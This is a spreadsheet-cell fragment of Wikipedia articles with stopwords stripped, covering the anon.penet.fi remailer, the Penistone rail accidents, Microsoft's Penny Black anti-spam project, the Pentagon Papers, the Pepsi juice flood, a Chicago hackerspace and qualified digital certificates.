remailer, julf told church could find evidence ward ever used penet remailer all. third compromise shutdown september 1996, anonymous user posted confidential writings church scientology penet remailer. church demanded julf turn identity users, claiming poster infringed church's copyright confidential material. church successful finding originating e-mail address posting penet remailed turned another anonymous remailer: alpha.c2.org nymserver, advanced secure remailer keep mapping e-mail addresses could subpoenaed.facing much criticism many attacks, unable guarantee anonymity penet users, julf shut remailer september 1996. also anonymous remailer crypto-anarchism cypherpunk pseudonymous remailer sintercom cyber-space references further reading mccullagh, declan (september 1996). "finnish line". hotwired, netizen. archived original june 2006. helmers, sabine (september 1997). brief history anon.penet.fi legendary anonymous remailer". magazine. post, david (april 1996). "the first internet war". reason magazine. (transcription hosted cyberspace institute) {{cite journal}}: external link |quote= (help) "johan helsingius gets injunction scientology case privacy protection anonymous messages still unclear" (press release). eff. september 1996. archived original september 2005. external links "the church scientology anon.penet.fi". spaink.net. "archive an144108's usenet postings" google. thomas, jim; meyer, gordon, eds. (february 1995). "computer underground digest".</t>
  </si>
  <si>
    <t>Penistone rail accidents</t>
  </si>
  <si>
    <t>over latter years 19th early years 20th centuries, penistone yorkshire gained name accident black-spot britain's railway network; indeed, could said hold title worst accident black-spot country. main line town woodhead route manchester, sheffield lincolnshire railway sheffield victoria manchester, london road. line heavily graded summit yards inside eastern portal woodhead tunnel. cattle drover's neglect, 1845 during parliamentary committee meeting debate building liverpool manchester railway, george stephenson asked would awkward train cow. classic reply, given broad northumbrian dialect, state "oo, awkward coo!".on evening october 1845 assumption dramatically test. shortly leaving dunford bridge sheffield bound train struck cow, drover penistone market unable remove line. impact caused locomotive carriages derail killed instantly. such force accident almost entirely half.none passengers suffered injuries minor bruising, although guard severely injured. replacement train dispatched sheffield passengers completed journey o'clock following morning. bullhouse bridge accident, 1884 first major accident occurred july 1884, miles west town, near bullhouse colliery. accident often referred "bullhouse bridge", road huddersfield passes line. express passenger train, 12:30 manchester london road london king's cross, carriages grimsby docks connection evening steamer sailing, left woodhead tunnel gathering speed downhill gradient towards penistone. locomotive 4-4-0 434, built gorton locomotive works.as entered curve bullhouse, driver felt engine develop uneasy roll, could apply brakes, heard crack. driving wheel axle locomotive snapped, resulting spread driving wheels distorted track. axle fracture probably caused metal fatigue. cheshire lines committee horsebox coupled behind engine derailed remained upright. coupling horsebox following carriages failed, first five carriages (the london portion train) rails embankment outside curve. last five ms&amp;l carriages (the grimsby portion) also derailed suffered less damage. nineteen passengers killed scene. five later died hospital, last august. many dead women toll also included railway mechanical engineer massey bromley. inspector's report allowed accident "could foreseen prevented". however question, among matters, inside cranked axles, iron rather steel important components. barnsley junction accident, 1885 second unfortunate incident took place side penistone station, huddersfield junction barnsley junction, within months. january 1885 special excursion train stations sheffield area liverpool coaches) southport coaches) climbing towards penistone. time train empty coal wagons travelling opposite direction return wagons collieries south yorkshire north nottinghamshire descending gradient passed huddersfield junction signal wagons derailed. driver locomotive applied brakes wagon, shireoaks 218, jumped forward became buffer-locked wagon front, shireoaks also came rails, struck locomotive excursion. wagon brushed aside locomotive rebounded first four excursion's carriages passed. fifth, sixth seventh carriages wrecked following three brought track. person killed accident others died result amputations. examination, shireoaks wagon found fractured axle flaws metal, problem caused metal fatigue. unexpected catastrophic failure axles (and wheels) problem railway vehicles time, owing lack understanding causes, especially fatigue crack initiation growth. crack initiation usually caused either defects poor design, stress concentrations raising local stress failure. small crack created would grow slowly repeated loading usage axle could longer withstand imposed loads. noted barnsley junction accident cold ballast railway sleepers frozen, increasing loads wheels axles.) although manchester, sheffield lincolnshire railway could held directly responsible accident, enquiry recommended thorough inspection rolling stock. huddersfield junction accident, 1889 next serious accident occurred four years later march 1889. this f.a. final. preston north end, considered best team country, play wolverhampton wanderers kennington oval, university boat race take place thames tideway putney mortlake london. manchester, sheffield lincolnshire railway excursion portions liverpool, southport wigan london, kings cross. although intended football excursion, many people lancashire took advantage watch preston play. southport portion train joined main train liverpool warrington central wigan portion picked glazebrook. completed train made cheshire lines committee tracks godley junction stop made railway clearing house checks. departed minutes late. locomotive class 188, six-coupled locomotive, usually found goods workings, regularly used excursion traffic. train gradient towards penistone station locomotive, leading wheels guide jumped points goods line diverged main line approach huddersfield junction signal box. locomotive crew stood posts applied brakes. coaches followed locomotive "six-foot" ripping yards track. tender capsized became entangled signal wires, locomotive ballast front coach totally smashed. coaches three toppled onto sides following three pulled round different directions left standing broadside first pair. person killed many injured. those minor injuries treated penistone station, severe injuries taken wentworth arms hotel, opposite bottom station approach road, billiard room turned operating theatre. crash averted prompt action signalman huddersfield junction box. having witnessed crash sent message barnsley junction, next sheffield side, "stop mail", 10:40 king's cross manchester mail already passed signals train driver applied brakes could stop hitting tender crashed locomotive. mail train's buffers penetrated plating tender bogie wheels thrown track, engine reach crashed coaches. railway inspectorate found leading axle locomotive fractured questioned "goods locomotive" passenger work, would travel higher speeds usual, locomotive leading bogie wheels. more 19th century accidents december 1882. accident penistone station shunting operations. passengers injured. september 1886. coach huddersfield, conveyed 5:30 king's cross manchester (london road) express detached penistone placed await collection local train. ms&amp;lr locomotive leading brake backed onto train, impact sending coaches, dining rear brake ticket platform. twenty passengers slightly injured.september 1887. just year later, almost identical accident occurred. october 1897. accident penistone station light locomotive collided carriage. three people injured, later died concussion. 20th century accidents february 1916. probably accident take place lancashire yorkshire railway line, penistone viaduct takes tracks northward station. lancashire yorkshire railway 2-4-2t locomotive, 661, standing viaduct embankment subsided collapse slow crew jumped safety arch fell down. cause collapse stated scouring foundations prolonged heavy rain; parapet viaduct observed cracked days earlier.27 february 1927. avoidable accident blamed mainly signalman's error, locomotive, aspinall radial tank 10760, huddersfield line, arrived discharged passengers, needed clear line allow empty coaching stock train bradford enter station. shunted stock platform prepare return working. locomotive needed turned (unnecessarily following usual practice line) worked opposite train, move needing quite backwards forwards shunts. final move reach front train "up" line, wrong line movement started lner line route available reach train. driver made last movement own, fireman sent "mash" (brew) porter's room. last move controlled hand signal given signal, huddersfield junction signalman, shift forgot points line locomotive went along main line station platform. driver realised something wrong stopped. seeing signal east platform "off", thought signalman realised error signal meant him. moved regain right line, signal fact intended manchester marylebone express, loaded five coaches hauled class "director" no.5437 "prince george", approaching. because speed restriction force penistone, train easing impact speed around miles hour km/h). driver seriously hurt accident. fireman jumped clear lner crew shaken. huddersfield junction signalman held responsible accident, although driver receive mention report breach rules. inspector also referred rule 55(b) provided fireman signalbox remain remind signalman presence train, standing running line. effects railway stretch line accidents occurred among bleakest scenery pennines, none earlier accidents could conveniently ascribed human error, superstitious field day. penistone reckoned unlucky place cross hills. other publicity concerned dangers asphyxiation passenger train stall woodhead tunnels, though wholly folklore. between 1910 1914, three instances westbound train crews overcome smoke tunnel driverless trains running away downhill gradient torside, diverted siding fitted substantial stop block. runaways section line continued, even line electrified.after another accident hexthorpe near doncaster south yorkshire 1886, workers ms&amp;lr offered contribute day's wages help cover costs resulting accident. board railway declined offer, considering unfair workers.the trans-pennine rail route manchester, sheffield lincolnshire railway part central section trans-pennine trail. also list british rail accidents notes footnotes printed sources allen, grant (1884). biographies working men. baxter, bertram (1982). baxter, david (ed.). british locomotive catalogue 1825–1923, volume lancashire yorkshire railway constituent companies. ashbourne, derbyshire: moorland publishing company. isbn 0-903485-85-0. dow, george (1959). great central, volume one: progenitors, 1813–1863. shepperton: allan. isbn 0-7110-1468-x. dow, george (1962). great central, volume two: dominion watkin, 1864–1899. shepperton: allan. isbn 0-7110-1469-8. earnshaw, alan (1996). illustrated history trains trouble. atlantic transport publishers. isbn 0-906899-69-9. marshall, john (1969). lancashire yorkshire railway, volume newton abbot: david charles. isbn 0-7153-4352-1. further reading rolt, danger. books. isbn 0-330-25555-x. milnes, roger; corry, christopher (november 1984). "bullhouse centenary". forward. great central railway society (48). issn 0141-4488. milnes, roger; corry, christopher (july 1985). "penistone: rail disaster coincidence years on". forward. great central railway society (52). issn 0141-4488.</t>
  </si>
  <si>
    <t>Penny Black (research project)</t>
  </si>
  <si>
    <t>penny black project microsoft research project tries find effective practical ways fighting spam. because identifying spams consumes recipient's time, idea make sender emails "pay" certain amount sending them. currency mode payment could cycles, turing tests memory cycles. such payment would limit spammers' ability send large quantities emails quickly. project's name derived penny black, world's first adhesive stamp used prepaid postage. objective goal project move e-mail costs receiver sender. general idea sender must prove expended certain amount effort specifically receiver message alone. project aims devise method without introducing additional challenge-response mechanisms third parties, without requiring extra maintenance updates, retaining current architecture e-mail system. ticket server project's ideas "ticket server", credit-based method validating emails. tickets would required perform actions, sending emails. there three operations ticket server provides: "request ticket", "cancel ticket", "refund ticket". server would allow user request ticket exchange proof work: expending cycles solving hard algorithms processing power, turing tests, even paying money. server could also cancel ticket. example, receiving email ticket, receiver could request ticket cancelled cannot reused. person cancels ticket also option refund ticket sender. this causes original sender regain ticket. example, user might refund ticket came email spam.using this, friendly trusted emails would little cost tickets would frequently refunded. however, spammers would required invest either computing time money order create enough tickets send large numbers e-mails. downfalls obvious flaws project entirely stop spam. hopes slow spam enough longer cost effective spammers. using methods reduce spam also require policies universal amongst mail clients. intended mass email also work intended. example, subscribers particular email service getting emails significant delay email service also become increased expenses provider. also proof-of-work system hashcash internet mail 2000 anti-spam techniques references external links overview penny black project microsoft (archived original)</t>
  </si>
  <si>
    <t>Pentagon Papers</t>
  </si>
  <si>
    <t>pentagon papers, officially titled report office secretary defense vietnam task force, united states department defense history united states' political military involvement vietnam 1945 1967. released daniel ellsberg, worked study, first brought attention public front page york times 1971. 1996 article york times said pentagon papers demonstrated, among things, johnson administration "systematically lied, public also congress."the pentagon papers revealed u.s. secretly enlarged scope actions vietnam coastal raids north vietnam marine corps attacks—none reported mainstream media. disclosure pentagon papers, ellsberg initially charged conspiracy, espionage, theft government property; charges later dismissed, prosecutors investigating watergate scandal discovered staff members nixon white house ordered so-called white house plumbers engage unlawful efforts discredit ellsberg.in june 2011, documents forming pentagon papers declassified publicly released. contents secretary defense robert mcnamara created vietnam study task force june 1967, purpose writing "encyclopedic history vietnam war". mcnamara claimed wanted leave written record historians, prevent policy errors future administrations, although gelb, director policy planning pentagon, said notion commissioned "cautionary tale" motive mcnamara used retrospect. mcnamara told others, dean rusk, asked collection documents rather studies received. motives aside, mcnamara neglected inform either president lyndon johnson secretary state dean rusk study. report claimed mcnamara planned give work friend, robert kennedy, seeking democratic presidential nomination 1968. later denied, though admitting informed johnson rusk.instead using existing defense department historians, mcnamara assigned close aide assistant secretary defense john mcnaughton collect papers. mcnaughton died plane crash month work began june 1967, project continued direction defense department official leslie gelb. thirty-six analysts—half active-duty military officers, rest academics civilian federal employees—worked study. analysts largely used existing files office secretary defense. order keep study secret others, including national security advisor walt rostow, conducted interviews consultations armed forces, white house, federal agencies.mcnamara left defense department february 1968, successor clark clifford received finished study january 1969, five days richard nixon's inauguration, although clifford claimed never read study consisted 3,000 pages historical analysis 4,000 pages original government documents volumes, classified "top secret sensitive". ("sensitive" official security designation; meant access study controlled.) task force published copies; think tank rand corporation received copies gelb, morton halperin paul warnke, access granted least three approved. organization content documents volumes papers organized follows:i. vietnam u.s., 1940–1950 vol.) u.s. policy, 1940–50 character power viet minh minh: asian tito? u.s. involvement franco–viet minh war, 1950–1954 vol.) u.s., france vietnamese nationalism toward negotiated settlementiii. geneva accords vol.) u.s. military planning diplomatic maneuver role obligations state vietnam viet minh position sino–soviet strategy intent geneva accordsiv. evolution vols.) u.s. diem: eisenhower commitments, 1954–1960 vols.) nato seato: comparison france indochina, 1950–54 u.s. france's withdrawal vietnam, 1954–56 u.s. training vietnamese national army, 1954–59 origins insurgencyb. counterinsurgency: kennedy commitments, 1961–1963 vols.) kennedy commitments programs, 1961 strategic hamlet program, 1961–63 advisory build-up, 1961–67 phased withdrawal u.s. forces vietnam, 1962–64 overthrow dinh diem, may–nov. 1963c. direct action: johnson commitments, 1964–1968 vols.) u.s. programs south vietnam, november 1963–april 1965: nsam nsam honolulu military pressures against vols.) february–june 1964 july–october 1964 november–december 1964 rolling thunder program begins: january–june 1965 marine combat units danang, march 1965 phase build-up u.s. forces: march–july 1965 u.s. ground strategy force deployments: 1965–1967 vols.) volume phase program program volume program volume iii: program north: 1965–1968 vols) volume volume re-emphasis pacification: 1965–1967 u.s.–gvn relations vols.) volume december 1963 june 1965 volume july 1965 december 1967 statistical survey war, north south: 1965–1967v. justification vols.) public statements vols.) volume truman administrationb eisenhower administration kennedy administration volume johnson administration internal documents vols.) roosevelt administration truman administration: vols.) volume 1945–1949 volume 1950–1952 eisenhower administration: vols.) volume 1953 volume 1954–geneva volume iii: geneva accords march 1956 volume 1956 french withdrawal 1960 kennedy administration vols.) book book iivi. settlement conflict vols.) negotiations, 1965–67: public record negotiations, 1965–67: announced position statements histories contacts vols.) 1965–1966 polish track moscow–london track 1967–1968 actual objective vietnam war: containment china although president johnson stated vietnam secure "independent, non-communist south vietnam", january 1965 memorandum assistant secretary defense john mcnaughton stated underlying justification "not help friend, contain china".on november 1965, secretary defense robert mcnamara sent memorandum president johnson, explained "major policy decisions respect course action vietnam". memorandum begins disclosing rationale behind bombing north vietnam february 1965: february decision bomb north vietnam july approval phase deployments make sense support long-run united states policy contain china. mcnamara accused china harboring imperial aspirations like nazi germany imperial japan. according mcnamara, chinese conspiring "organize asia" united states: china—like germany 1917, like germany west japan east late 30s, like ussr 1947—looms major power threatening undercut importance effectiveness world and, remotely menacingly, organize asia encircle chinese, united states aimed establish "three fronts" part "long-run effort contain china": there three fronts long-run effort contain china (realizing ussr "contains" china north northwest): japan–korea front; india–pakistan front; southeast asia front. however, mcnamara admitted containment china would ultimately sacrifice significant amount america's time, money lives. internal affairs vietnam years gulf tonkin incident occurred august 1964, u.s. government indirectly involved vietnam's affairs sending advisors (military personnel) train south vietnamese soldiers: under president harry truman, u.s. government aided france communist-led viet minh first indochina war. under president dwight eisenhower, u.s. government played "direct role ultimate breakdown geneva settlement" 1954 supporting fledgling south vietnam covertly undermining communist country north vietnam. under president john kennedy, u.s. government transformed policy towards vietnam limited "gamble" broad "commitment". under president johnson, u.s. government began waging covert military operations communist north vietnam defense south vietnam. role united states rise president diem section pentagon papers titled "kennedy commitments programs", america's commitment south vietnam attributed creation country united states. acknowledged papers: must note south vietnam (unlike countries southeast asia) essentially creation united states. sub-section titled "special american commitment vietnam", papers emphasized role played united states: without u.s. support [ngo dinh] diem almost certainly could consolidated hold south 1955 1956. without threat u.s. intervention, south vietnam could refused even discuss elections called 1956 geneva settlement without immediately overrun viet minh armies. without u.s. years following, diem regime certainly, independent south vietnam almost certainly, could survived. more specifically, united states sent us$28.4 million worth equipment supplies help diem regime strengthen army. addition, 32,000 south vietnam's civil guard trained united states cost us$12.7 million. hoped diem's regime, receiving significant amount u.s. assistance, would able withstand viet cong.the papers identified general edward lansdale, served office strategic services (oss) worked central intelligence agency (cia), "key figure" establishment diem president south vietnam, backing diem's regime thereafter. written lansdale 1961 memorandum: (the u.s.) must support dinh diem another strong executive replace legally." role united states overthrow diem's regime according pentagon papers, u.s. government played role 1963 south vietnamese coup, diem assassinated. while maintaining "clandestine contact" vietnamese generals planning coup, u.s. president diem openly supported successor government authors called "essentially leaderless vietnam": military coup d'etat dinh diem, u.s. must accept full share responsibility. beginning august 1963 variously authorized, sanctioned encouraged coup efforts vietnamese generals offered full support successor government. october diem direct rebuff, giving green light generals. maintained clandestine contact throughout planning execution coup sought review operational plans proposed government. thus, nine-year rule diem came bloody end, complicity overthrow heightened responsibilities commitment essentially leaderless vietnam. early august 1963, unnamed u.s. representative vietnamese generals planning coup diem. according york times, u.s. representative later identified officer lucien conein. proposed operations director central intelligence, john mccone, proposed following categories military action: category raids major viet cong supply centers, conducted simultaneously republic vietnam force united states force (codenamed farmgate) category cross-border raids major viet cong supply centers, conducted south vietnamese units military advisors. category limited strikes north vietnamese targets unmarked planes flown exclusively non-us aircrews.however, mccone believe military actions alone could lead escalation situation "fear escalation would probably restrain communists". memorandum addressed president johnson july 1964, mccone explained: response first second categories action, local communist military forces areas actual attack would react vigorously, believe none communist powers involved would respond major military moves designed change nature conflict strikes north vietnam (category would evoke sharper communist reactions strikes confined targets laos, even case fear escalation would probably restrain communists major military response barely month gulf tonkin incident august 1964, national security advisor mcgeorge bundy warned provocations undertaken october, government south vietnam (gvn) would become fully prepared full-scale north vietnam. memorandum addressed president johnson september 1964, bundy wrote: main question extent elements actions would tend deliberately provoke reaction, consequent retaliation examples actions considered running naval patrols increasingly close north vietnamese coast and/or [sic] associating operations. believe deliberately provocative elements added immediate future still struggling feet. early october, however, recommend actions depending progress communist reaction meantime, especially naval patrols. while maritime operations played role provocation north vietnam, u.s. military officials initially proposed lockheed reconnaissance aircraft country, replaced plans. leak daniel ellsberg knew leaders task force well. worked aide mcnaughton 1964 1965, worked study several months 1967, gelb halperin approved access work rand 1969. opposing war, ellsberg friend anthony russo photocopied study october 1969 intending disclose ellsberg approached nixon's national security advisor henry kissinger, senators william fulbright george mcgovern, others, none interested.in february 1971, ellsberg discussed study york times reporter neil sheehan, gave volumes march. before publication, york times sought legal advice. paper's regular outside counsel, lord lord, advised publication, in-house counsel james goodale prevailed argument press first amendment right publish information significant people's understanding government's policy. york times began publishing excerpts june 1971; first article series titled "vietnam archive: pentagon study traces three decades growing involvement". study dubbed pentagon papers resulting media publicity. street protests, political controversy, lawsuits followed. ensure possibility public debate papers' content, june senator mike gravel, alaska democrat, entered 4,100 pages papers record subcommittee public buildings grounds. these portions papers, edited gravel howard zinn noam chomsky, subsequently published beacon press, publishing unitarian universalist association congregations. federal grand jury subsequently empaneled investigate possible violations federal release report. leonard rodberg, gravel aide, subpoenaed testify role obtaining arranging publication pentagon papers. gravel asked court gravel united states) quash subpoena basis speech debate clause article section united states constitution. that clause provides "for speech debate either house, senator representative] shall questioned place", meaning gravel could prosecuted anything said senate floor, and, extension, anything entered congressional record, allowing papers publicly read without threat treason trial conviction. when gravel's request reviewed u.s. supreme court, court denied request extend protection gravel rodberg grand jury subpoena served related third party rather committed preparation materials later entered congressional record. nevertheless, grand jury investigation halted, publication papers never prosecuted. later, ellsberg said documents "demonstrated unconstitutional behavior succession presidents, violation oath violation oath every subordinates." added leaked papers perceived wrongful war". nixon administration's restraint media president nixon first planned nothing publication study since embarrassed johnson kennedy administrations rather his. henry kissinger convinced president opposing publication negative precedent future secrets. administration argued ellsberg russo guilty felony espionage 1917, authority publish classified documents. after failing persuade york times voluntarily cease publication june attorney general john mitchell nixon obtained federal court injunction forcing york times cease publication three articles. york times publisher arthur ochs sulzberger said: these papers, editorial said morning, really part history made available considerably longer ago. feel breach national security, sense giving secrets enemy. newspaper appealed injunction, case york times united states (403 u.s. 713) quickly rose u.s. legal system supreme court.on june 1971, washington post began publishing series articles based upon pentagon papers; ellsberg given portions washington post reporter bagdikian. bagdikian brought information editor bradlee. that day, assistant u.s. attorney general william rehnquist asked washington post cease publication. after paper refused, rehnquist sought injunction u.s. district court. judge murray gurfein declined issue injunction, writing "[t]he security nation ramparts alone. security also lies value free institutions. cantankerous press, obstinate press, ubiquitous press must suffered authority preserve even greater values freedom expression right people know." government appealed decision, june supreme court agreed hear jointly york times case. fifteen newspapers received copies study began publishing supreme court allows publication june 1971, supreme court decided, 6–3, government failed meet heavy burden proof required prior restraint injunction. nine justices wrote nine opinions disagreeing significant, substantive matters. only free unrestrained press effectively expose deception government. paramount among responsibilities free press duty prevent part government deceiving people sending distant lands foreign fevers foreign shot shell. thomas tedford dale herbeck summarized reaction editors journalists time: press rooms times post began lifting censorship order, journalists america pondered grave concern fact fifteen days 'free press' nation prevented publishing important document troubles given inconclusive uninspiring 'burden-of-proof' decision sharply divided supreme court. there relief, great rejoicing, editorial offices america's publishers broadcasters. legal charges ellsberg ellsberg surrendered authorities boston, admitted given papers press: felt american citizen, responsible citizen, could longer cooperate concealing information american public. clearly jeopardy prepared answer consequences decision". indicted grand jury angeles charges stealing holding secret documents. federal district judge william matthew byrne, declared mistrial dismissed charges ellsberg russo 1973, revealed agents acting orders nixon administration illegally broke office ellsberg's psychiatrist attempted steal files; representatives nixon administration approached ellsberg trial judge offer directorship; several irregularities appeared government's case including claim lost records illegal wiretapping ellsberg conducted white house plumbers contemporaneous watergate scandal. byrne ruled: "the totality circumstances case briefly sketched offend sense justice. bizarre events incurably infected prosecution case." ellsberg russo freed mistrial; acquitted violating espionage act.in march 1972, political scientist samuel popkin, assistant professor government harvard university, jailed week refusal answer questions grand jury investigating pentagon papers case, hearing boston federal district court. faculty council later passed resolution condemning government's interrogation scholars grounds unlimited right grand juries question expose witness citations contempt could easily threaten scholarly research".gelb estimated york times published five percent study's 7,000 pages. beacon press edition also incomplete. halperin, originally classified study secret, obtained unpublished portions freedom information university texas published 1983. national security archive published remaining portions 2002. study remained formally classified 2011. impact pentagon papers revealed united states expanded bombing cambodia laos, coastal raids north vietnam, marine corps attacks, none reported american media. damaging revelations papers revealed four administrations (truman, eisenhower, kennedy, johnson) misled public regarding intentions. example, eisenhower administration actively worked geneva accords. john kennedy administration knew plans overthrow south vietnamese leader dinh diem death november 1963 coup. president johnson decided expand promising seek wider war" 1964 presidential campaign, including plans bomb north vietnam well 1964 election. president johnson outspoken election claimed opponent barry goldwater wanted bomb north vietnam.in another example, memo defense department johnson administration listed reasons american persistence: avoid humiliating u.s. defeat reputation guarantor). keep [south vietnam] (and adjacent) territory chinese hands. permit people south vietnam] enjoy better, freer life. also emerge crisis without unacceptable taint methods used. help friend, although would hard stay asked out.another controversy president johnson sent combat troops vietnam july 1965, pretending consult advisors july 21–27, cable stating "deputy secretary defense cyrus vance informs mcnamara president approved battalion plan push reserve call-up."in 1988, cable declassified, revealed "there continuing uncertainty [johnson's] final decision, would await secretary mcnamara's recommendation views congressional leaders, particularly views senator [richard] russell."nixon's solicitor general erwin griswold later called pentagon papers example "massive overclassification" trace threat national security". pentagon papers' publication little effect ongoing dealt documents written years publication.after release pentagon papers, goldwater said: during campaign, president johnson kept reiterating would never send american boys fight vietnam. say, knew time american boys going sent. fact, knew days republican convention. called trigger-happy, warmonger, bomb happy, time johnson saying, would never send american boys, knew damn well would. senator birch bayh, thought publishing pentagon papers justified, said: existence documents, fact said thing people believe something else, reason credibility today, reason people believe government. this thing that's going last two-and-a-half years administration. there difference president says government actually does, confidence going make right decision, facts. gelb reflected 2018 many people misunderstood important lessons pentagon papers: first instinct papers, people would think definitive history war, not, people would, would think lying, rather beliefs. look, we'd never learned darn lesson believing wars, went afghanistan went iraq... know, involved wars know damn thing countries, culture, history, politics, people even below. and, heavens, wars like world world battalions fighting battalions. these wars depend knowledge people are, culture like. jumped without knowing. that's damned essential message pentagon papers. full release 2011 2011, national archives records administration announced papers would declassified released richard nixon presidential library museum yorba linda, california, june 2011. release date included nixon, kennedy, johnson libraries archives office college park, maryland.the full release coordinated archives's national declassification center (ndc) special project mark anniversary report. there still eleven words agencies classification control material wanted redact, worked them, successfully, prevent redaction. unknown words issue government declined requests identify them, issue made moot pointed words already made public, version documents released house armed services committee 1972.the archives released volume pentagon papers separate file, available website. films television films pentagon papers (2003), directed holcomb executive produced joshua maurer, historical film made association paramount television city entertainment, pentagon papers daniel ellsberg's involvement publication. film represents ellsberg's life, beginning work rand corp. ending espionage trial declared mistrial federal court judge. film starred james spader, paul giamatti, alan arkin, claire forlani. most dangerous america: daniel ellsberg pentagon papers (2009) oscar nominated documentary film, directed judith ehrlich rick goldsmith, follows ellsberg explores events leading publication pentagon papers. post (2017) historical drama film directed co-produced steven spielberg script written hannah josh singer pair washington post employees battle federal government right publish pentagon papers. film stars hanks bradlee meryl streep katharine graham. daniel ellsberg played matthew rhys. television pentagon papers, daniel ellsberg times. pbs. october 2010. archived original august 2008. september 2010, york times community affairs department presented panel discussion pentagon papers, daniel ellsberg, times. conversation, featuring daniel ellsberg, frankel, former york times executive editor, adam liptak, york times supreme court reporter, moderated jill abramson, managing editor york times" former washington bureau chief, marking 35th anniversary supreme court ruling. daniel ellsberg: secrets vietnam pentagon papers. university california television (uctv). august 2008. archived original november 2021. 1971 defense department analyst, former u.s. marine company commander anti-communist daniel ellsberg leaked pentagon papers media. talk, ellsberg presents explosive inside account helped bring vietnam richard nixon's presidency. also talks current potential iraq feels would major mistake united states." series: voices [1/2003] [public affairs] [humanities] [show 7033]" also references works cited mcnamara, robert (1996). retrospect. random house. isbn 978-0-679-76749-7. further reading pentagon papers: defense department history united states decisionmaking vietnam. boston: beacon press. vols. "senator gravel edition"; includes documents included government version. isbn 0-8070-0526-6 isbn 0-8070-0522-3. neil sheehan. pentagon papers. york: bantam books (1971). isbn 0-552-64917-1. daniel ellsberg. secrets: memoir vietnam pentagon papers. york: viking (2002). isbn 0-670-03030-9. "marcus raskin: him, ideas seedlings effective action" (obituary marcus raskin), nation, 2018, marcus raskin 1971, receiving "from source (later identified daniel ellsberg) mountain paper' became known pentagon papers [p]lay[ed] customary catalytic role [and] ellsberg touch york times reporter neil sheehan longtime passionate proponent nuclear disarmament, [raskin] would also serve 1980s chair sane freeze campaign." george herring (ed.) pentagon papers: abridged edition. york: mcgraw-hill (1993). isbn 0-07-028380-x. george herring (ed.) secret diplomacy vietnam war: negotiating volumes pentagon papers (1983). external links pentagon papers. u.s. national archives. august 2016. complete, unredacted report. pentagon papers (complete gravel ed.). mtholyoke.edu. complete text supporting documents, maps, photos. "battle pentagon papers". secret. resource site supports currently playing docu-drama pentagon papers. site provides historical context, time lines, bibliographical resources, information discussions current journalists, helpful links. gravel, mike; ellsberg, daniel (july 2002). "special: pentagon papers came published beacon press". democracy now!. archived original july 2007. (audio/video transcript). "nixon tapes supreme court oral arguments". gwu.edu. holt, steve (1971). "the pentagon papers: report". wcbs newsradio (wcbs-am york). archived original january 2008. part wcbs 880's celebration years newsradio. trzop, allison. beacon press pentagon papers. beacon press. "the most dangerous america: documentary chronicles leak pentagon papers helped vietnam war". democracy now!. september 2009. blanton, thomas (june 2001). pentagon papers: secrets, lies audiotapes (the nixon tapes supreme court tapes, national security archive electronic briefing book 48). national security archive george washington university. compiled prados, john; meadows, eddie; burr, william evans, michael.</t>
  </si>
  <si>
    <t>Pepsi fruit juice flood</t>
  </si>
  <si>
    <t>pepsi fruit juice flood flood 176,000 barrels million litres; million gallons) fruit vegetable juices streets lebedyan, russia, river, caused collapse pepsico warehouse. history april 2017, pepsico warehouse's roof collapsed unexpectedly. warehouse located lebedyan, center pepsi's operations russia, operated pepsico subsidiary lebedyansky. warehouse contained variety fruit vegetable juices. collapse roof caused minor injuries sent million litres (7.4 million gallons) juices streets lebedyan river. however, deaths resulted spill.there concern juices might damaged aquatic ecosystem river, water samples showed evidence environmental damage caused spill.pepsico officials apologized incident, offered damages caused, stated working local officials determine cause warehouse collapse. also list non-water floods references external links video pepsi fruit juice flood</t>
  </si>
  <si>
    <t>Pumping Station: One</t>
  </si>
  <si>
    <t>pumping station: non-profit hackerspace/makerspace chicago, illinois. facilities consist approximately 11,000 square feet (1,000 shop, workspace, lounge areas. about organization provides workspace social group people interested learning. members encouraged share knowledge already possess structured classes common. member necessarily "hacker" computer sense members computer experts rather "someone makes something modifies uses wasn’t originally intended." other members volunteer professions support group, legal support. history pumping station: started loosely knit social group like-minded individuals meeting regularly local cafes. april 2009, lease signed 3354 elston ave. city chicago.by 2013, organization grown members mid-june, moved location 3519 elston ave. 2016, membership grown 435. time, shop become well equipped, including large format router, watt large format laser cutter, vertical mill lathe, well number printers equipment. january 2018 members. involvement notable events august 2010, pumping station: took part hackerspace challenge sponsored scion. their entry tron-cycle-powered cream maker. pumping station: member burke launched power racing series. first season 2009 consisted cars, backed pumping station: members. second season 2010 hosted maker faire detroit competitors several hackerspaces throughout country. facilities facilities include: computer controlled tools, ranging printers, laser cutters, mills. electronics/mechatronics where electronics related things reside, meters, scopes, soldering equipment/supplies, mixed electronics devices hacking parts salvaging. general area includes lounge room, work table spaces shop, scanning electron microscope. graphic arts textiles sewing fiber arts section space. this contains equipment sewing, weaving related activities. metals shop space metals work, welding, grinding, forging. kitchen area things food drink related. beer church, brewing group, mostly hosted here. cold metals shop space cold metals works. tools include mills, lathes, etc. woodshop shop space woodworking projects. tools include sawstop table saw, router, jointer, thickness planer. small metals shop space making jewelry, small metal sculpture. references external links official pumping station: website vimby video overview pumping station:</t>
  </si>
  <si>
    <t>Qualified digital certificate</t>
  </si>
  <si>
    <t>context regulation (eu) 910/2014 (eidas), qualified digital certificate public certificate issued trust service provider government-issued qualifications. certificate designed ensure authenticity data integrity electronic signature accompanying message and/or attached data. description eidas defines several tiers electronic signatures used conducting public sector private transactions within across borders member states. qualified digital certificate, addition specific services provided qualified trust service provider, required elevate status electronic signature considered qualified electronic signature. using cryptography, digital certificate, also known public certificate, contains information link owner digital signature trust entity verifies authenticity content signed. according eidas, considered qualified digital certificate, certificate must meet requirements provided annex regulation (eu) 910/2014, including, limited identification certificate qualified certificate electronic signature identification qualified trust service provider issued qualified certificate, including information corresponding electronic signature validation data electronic signature creation data indication certificate's period validity unique certificate identity code trust service provider qualified trust service provider's advanced electronic signature electronic seal vision need non-repudiation authentication electronic signatures originally addressed electronic signatures directive 1999/93/ec help facilitate secure transactions, specifically occur across borders member states. eidas regulation later replaced directive defined standards used creation qualified digital certificates trust service providers. role qualified trust service provider qualified digital certificate issued qualified trust service provider received authorization member state's supervisory body provide qualified trust services creating qualified electronic signatures. provider must listed upon trust list; otherwise, permitted provide qualified digital certificates qualified trust services. trust service provider required abide guidelines established eidas creating qualified digital certificate, include: providing valid date time stamp certificate created, immediate revocation signature expired certificate, providing appropriate training employees involved providing trust services, equipment software used trust services must trustworthy capable preventing certificates forged. legal implications electronic signatures qualified digital certificates court, qualified electronic signature provided highest level probative value, makes difficult refute authorship. qualified electronic signature, along qualified certificate given consideration handwritten signature used evidence legal proceedings. validity qualified electronic signature created qualified certificate must accepted member states regardless member state signature produced global perspective parts world, 